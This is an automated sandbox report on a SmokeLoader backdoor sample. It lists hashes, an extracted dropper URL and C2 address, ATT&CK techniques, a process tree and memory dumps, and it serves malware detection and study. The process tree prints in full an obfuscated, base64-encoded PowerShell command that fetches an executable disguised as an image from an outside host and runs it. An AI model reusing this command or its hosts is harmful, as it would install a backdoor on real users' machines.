smokeloader | 5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

General

Target

9fbd32c6bb25f6a660696fa9830c5040.exe
Size

847KB
MD5

9fbd32c6bb25f6a660696fa9830c5040
SHA1

1e41347d36792e823a8982b10170d83a0722e3cc
SHA256

5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
SHA512

3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/28oLW.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.115.43/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

11 1984 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

eVDwACBtpW.exe

pid process

3864 eVDwACBtpW.exe

flow	pid	process
11	1984	powershell.exe

pid	process
3864	eVDwACBtpW.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

eVDwACBtpW.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	eVDwACBtpW.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	eVDwACBtpW.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

864 powershell.exe
864 powershell.exe
864 powershell.exe
1984 powershell.exe
1984 powershell.exe
1984 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

eVDwACBtpW.exe

pid process

3864 eVDwACBtpW.exe
3864 eVDwACBtpW.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 864 powershell.exe
Token: SeDebugPrivilege 1984 powershell.exe

pid	process
864	powershell.exe
864	powershell.exe
864	powershell.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe

pid	process
3864	eVDwACBtpW.exe
3864	eVDwACBtpW.exe

description	pid	process
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exe

pid	process
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exe

pid	process
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe
3724	9fbd32c6bb25f6a660696fa9830c5040.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3724 wrote to memory of 864	3724	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 3724 wrote to memory of 864	3724	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 3724 wrote to memory of 864	3724	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 864 wrote to memory of 1984	864	powershell.exe	powershell.exe
PID 864 wrote to memory of 1984	864	powershell.exe	powershell.exe
PID 864 wrote to memory of 1984	864	powershell.exe	powershell.exe
PID 1984 wrote to memory of 3864	1984	powershell.exe	eVDwACBtpW.exe
PID 1984 wrote to memory of 3864	1984	powershell.exe	eVDwACBtpW.exe
PID 1984 wrote to memory of 3864	1984	powershell.exe	eVDwACBtpW.exe

C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe
"C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:3864

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
b751492c41c6f3173d3b6f31c1b9b4eb

SHA1
abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

SHA256
ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

SHA512
afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c291c0887c56d214e439ad34d4acaa06

SHA1
93591047b41785cbc6803b1a2f2d74a1f18f837c

SHA256
1019a10aa7aa75b5c3eedf558fc34d5d06ecdbdaa3244e88b2d415631b9474d9

SHA512
45ec253c5a59efb825497b70f7beb3894460de81f819f78822040097c21bf204794d749a19ea3fac43c5c4d63c49fa865d0f05a239effd4413bc6d3d6c21143b

Download Submit
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
memory/864-124-0x0000000007720000-0x0000000007721000-memory.dmp

Filesize
4KB

Download
memory/864-127-0x0000000007D50000-0x0000000007D51000-memory.dmp

Filesize
4KB

Download
memory/864-122-0x0000000006D30000-0x0000000006D31000-memory.dmp

Filesize
4KB

Download
memory/864-123-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/864-120-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

Filesize
4KB

Download
memory/864-125-0x0000000007450000-0x0000000007451000-memory.dmp

Filesize
4KB

Download
memory/864-126-0x0000000007F60000-0x0000000007F61000-memory.dmp

Filesize
4KB

Download
memory/864-121-0x0000000006C90000-0x0000000006C91000-memory.dmp

Filesize
4KB

Download
memory/864-170-0x0000000000E34000-0x0000000000E36000-memory.dmp

Filesize
8KB

Download
memory/864-169-0x0000000000E33000-0x0000000000E34000-memory.dmp

Filesize
4KB

Download
memory/864-114-0x0000000000000000-mapping.dmp

Download
memory/864-118-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/864-119-0x0000000000E32000-0x0000000000E33000-memory.dmp

Filesize
4KB

Download
memory/864-117-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

Filesize
4KB

Download
memory/1984-139-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/1984-154-0x0000000009880000-0x0000000009881000-memory.dmp

Filesize
4KB

Download
memory/1984-155-0x000000000A970000-0x000000000A971000-memory.dmp

Filesize
4KB

Download
memory/1984-153-0x00000000098E0000-0x00000000098E1000-memory.dmp

Filesize
4KB

Download
memory/1984-148-0x0000000004BE3000-0x0000000004BE4000-memory.dmp

Filesize
4KB

Download
memory/1984-147-0x0000000009380000-0x0000000009381000-memory.dmp

Filesize
4KB

Download
memory/1984-146-0x0000000009DF0000-0x0000000009DF1000-memory.dmp

Filesize
4KB

Download
memory/1984-140-0x0000000004BE2000-0x0000000004BE3000-memory.dmp

Filesize
4KB

Download
memory/1984-128-0x0000000000000000-mapping.dmp

Download
memory/2116-168-0x0000000001020000-0x0000000001035000-memory.dmp

Filesize
84KB

Download
memory/2116-167-0x0000000001040000-0x0000000001041000-memory.dmp

Filesize
4KB

Download
memory/3864-160-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads